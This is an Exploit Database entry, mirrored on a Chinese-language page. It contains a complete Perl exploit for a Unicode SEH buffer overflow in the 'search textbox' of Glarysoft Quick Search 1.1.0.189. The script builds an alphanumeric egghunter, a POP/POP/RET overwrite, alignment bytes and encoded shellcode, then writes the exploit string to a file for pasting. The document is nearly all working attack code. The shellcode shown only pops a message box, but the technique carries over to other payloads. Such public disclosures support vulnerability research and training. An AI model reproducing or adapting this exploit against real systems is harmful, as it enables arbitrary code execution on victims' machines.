Quick Search 1.1.0.189 – search textbox Buffer Overflow (SEH Unicode) (Egghunter)

• Exploit Database
• 14 阅读

• 作者： Tomislav Paskalev
  日期： 2015-04-23
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36822/

• #!/usr/bin/perl
  
  ###########################################################################=
  #######################
  # Exploit Title: Quick Search 1.1.0.189 'search textbox' Unicode SEH egghunter Buffer Overflow
  # Date: 2015-04-23
  # Exploit Author: Tomislav Paskalev
  # Vulnerable Software: Quick Search v1.1.0.189
  # Vendor Homepage: http://www.glarysoft.com/
  # Software Link: https://www.exploit-db.com/apps/93feb6805c08d3ca84b0636a3a986a56-qsearchsetup.exe
  # Version: 1.1.0.189
  # Tested on: Windows XP SP2 EN
  # OSVDB-ID: 93445
  ###########################################################################=
  #######################
  # Credits:
  # - Vulnerability identified by ariarat
  # http://www.exploit-db.com/exploits/25443/
  ###########################################################################=
  #######################
  # Exploit development notes:
  # - instead of attaching the process, start the executable within the debugger
  # - the application's module gtms_D7.bpl was not compiled with SafeSEH
  # - since this is a unicode buffer overflow \x00 will not terminate the string
  # - 6 available unicode friendly P/P/R pointers within the module
  # - this exploit should work across different OS versions
  # (tested only on Win XP SP2 EN)
  # - several other unicode friendly aplication modules are available, but have not been checked
  ###########################################################################=
  #######################
  # How to exploit:
  # - Quick Search -> (click arrow for menu) Match Path -> (click arrow for menu) Full Mode ->=20
  # (paste created exploit string into the search textbox)
  # - once the exploit string is pasted, the egghunter starts to search the memory for the marker
  # - on my test machine the search takes around 30 seconds (until the shellcode gets executed)
  # - during the search the mouse cursor will NOT have a hourglass displayed beside it
  # - during the search the application will NOT become unresponsive (i.e. it will be usable)
  ###########################################################################=
  #######################
  # Thanks to:
  # - ariarat (PoC)
  # - Peter Van Eeckhoutte (exploit development tutorials)
  # - Offensive Security (IT security courses, admin support)
  ###########################################################################=
  #######################
  
  my $junk = "A" x 21;
  
  # Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
  # msfencode -e x86/alpha_mixed
  # msfencode -e x86/unicode_upper BufferRegister=EAX
  # converted to ASCII
  my $egghunter =
  "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
  "11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
  "B9KHHHYCDO4KD1KB3QIQ9OY190IQ9PIQ9PI0IOS13PCPC1313PCOGB11J2J11R8R" .
  "0P01100OQRK11OQB102Q1OR02PB0BNP0BORQ11228PPP8Q1PBT50JQ9RUOF0M212" .
  "J1Z3IRO3F2O41QB1VP2S20J26RBP3BHRZ2MBVPNRGPLCCOESBCJ2C14482O2O18B" .
  "52000P02EB032PTBNBKR92J0L2OBR1E3ICJPLRO0B0URZ0G2KPO1I2W11Q1AA";
  
  my $fill = "C" x (1045 - length($junk.$egghunter));
  my $nextSEH = "\x41\x6d"; # INC ECX; INSW Yz DX
  my $SEH = "\x70\x34"; # POP POP RET from gtms_D7.bpl
  
  # jump to egghunter code
  my $allign = "\x58";# POP EAX
  $allign = $allign."\x6d"; # NOP/remove NULL bytes
  $allign = $allign."\x58"; # POP EAX
  $allign = $allign."\x6d"; # NOP/remove NULL bytes
  $allign = $allign."\x58"; # POP EAX
  $allign = $allign."\x6d"; # NOP/remove NULL bytes
  $allign = $allign."\x05\x01\x11"; # ADD EAX, 0x11000100
  $allign = $allign."\x6d"; # NOP/remove NULL bytes
  $allign = $allign."\x2d\x09\x11"; # SUB EAX, 0x11000900
  $allign = $allign."\x6d"; # NOP/remove NULL bytes
  my $jumptoegghunter = "\x50"; # PUSH EAX
  $jumptoegghunter = $jumptoegghunter."\x6d"; # NOP/remove NULL bytes
  $jumptoegghunter = $jumptoegghunter."\xc3"; # RETN
  
  # fill the rest of the stack frame + padding (to avoid a memory area which coverts to upper alpha)
  my $fill2 = "D" x 500;
  
  # allign EAX and jump to shellcode
  # (this gets executed after the marker is found)
  my $allign2 = "\x6d"; # NOP/remove NULL bytes
  $allign2 = $allign2."\x57"; # PUSH EDI
  $allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
  $allign2 = $allign2."\x58"; # POP EAX
  $allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
  $allign2 = $allign2."\xb9\x1b\xaa"; # MOV ECX, 0xaa001b00
  $allign2 = $allign2."\xe8"; # ADD AL,CH (equivalent to adding "1b" (from the previous command)
  # to the last two bytes of EAX; i.e. increase EAX with "1b")
  $allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
  $allign2 = $allign2."\x50"; # PUSH EAX
  $allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
  $allign2 = $allign2."\xc3"; # RETN
  
  # msfpayload windows/messagebox
  # msfencode -e x86/alpha_mixed
  # msfencode -e x86/unicode_upper BufferRegister=EAX
  # converted to ASCII
  my $shellcode =
  "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
  "11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
  "BYKWTHY44MTZTQNPV29190IQ919PI19PIOY19Q3Q3PC13Q3PC13070QPZ2JQ1B8R" .
  "000Q10011RKOQQ10QOBOQ0BOBORQ200Q2Q2Q1Q2QHB0OHQ1Q2CEPJQ91JRY2XBKB" .
  "MPKPI19S3Q4NVQ40J0TBT2QOZRR0N0RPPD70TT1RJC9OEP4PN2KNQQQPD400N2KN" .
  "PSFQ4PLPNBKNT0615PL2NRKRPOV0418PNRKBSPNOW20PL0KBGQ6B51XPRRO2D0X0" .
  "Q35PLP3NS1YB3P11H0Q49BOR92QRQ40RL0KBPRLBD340UD4RNBK010UQW0L2N2KN" .
  "S343F18QBQHBFS1492Z0LPK0PPJB7QXBL0KBR3J2QNP33P1T8RKCJQ3OGPDQ3D9R" .
  "NBKPTSDBL0KBFQQOX2N4621PK0OR0NQD9R02KPL0N0LRKNTPKRP0RB4162G2I21N" .
  "XPO162M03NQ38OWNX2KQ9QTB7PKRSPL1QOD1F0HBQ2E2M01PNRK02CJ0UCDPF1QP" .
  "JPKP5OFBLPK16RLR0PK0N2KQCQZC50L1EPQCHBK0NRK45PTBN2K1CP1QX1XPOD9Q" .
  "ST4PE3DCE0LD3R1NX13NXP2C3NX1G1IBNODRK0948C5POSI2JQRQ5NX0L0NNR2N3" .
  "F2NBJ0LR3BBPK0XBMPO492OCIBO29RO0OSIT7P52D0D0MRKC1RNPJD8PY422C0CB" .
  "OBWSEPLP4341C2BB8QX0N2N0IBOQ92OD9BO2N1YPC45Q7RXNR0HB02L2PBLB1003" .
  "7NQ0148RVPS2F1B342NOC0TPUNXODOE221CNRQ51312PKNXP10LQFOTQ62J0MB92" .
  "MP61606NYBOBSBEBCODPLOYBO02CFNPPMBKPNOX2OQBC2BMPOPL2M0W1W2LNW24S" .
  "112BK1H41T11YBO29BO2KPO130X2PQHNQ00P1P0QGB0NS0XNRCDQEP531BC43OTR" .
  "0P12KRK0NRH410LD4BD45PT0LOY0JPCBBOXC2PNOF0N03BHPW0PR1D82PC1BDP43" .
  "5P9OB0OB508ODP00B0LS2PI030SD508NQSD370PC3PQP040D5P8020OOEOI0B1DN" .
  "PS5NUOHP31ER4OHPB0PT20L031HNS0D13B8BSB5NQ00P1BXQ70P3B0OPPQVBUT0S" .
  "B18OBB4320E012HT4ODPCR8QU40R30SRBPO32PNORQ8P5D0QQQTOENXR2PEPP38B" .
  "R0NPG20D0BIT0BNB5P80B251QS4T02IR0ROP038T30UP2B83CR5R3232B0HP20OR" .
  "3B4P0C5R1NPB1SH0EP5T5P41WR0Q5P3BBQ8P3BW03B1OCQINPRNP4T1SJ2IPO3HT" .
  "22LC724B3CBBN390MNQQ60QT912120J01R013C32CS1QS2B0KPOB8R03DBQ2K2PR" .
  "PPP0KPOBB3E0FQXOQOQAA";
  
  my $payload = $junk.$egghunter.$fill.$nextSEH.$SEH.$allign.$jumptoegghunter.$fill2."0t0t".$allign2.$shellcode;
  
  open(myfile,'>QuickSearch_egghunter_messagebox.txt');
  print myfile $payload;
  close(myfile);
  print "Wrote ".length($payload)." bytes\n";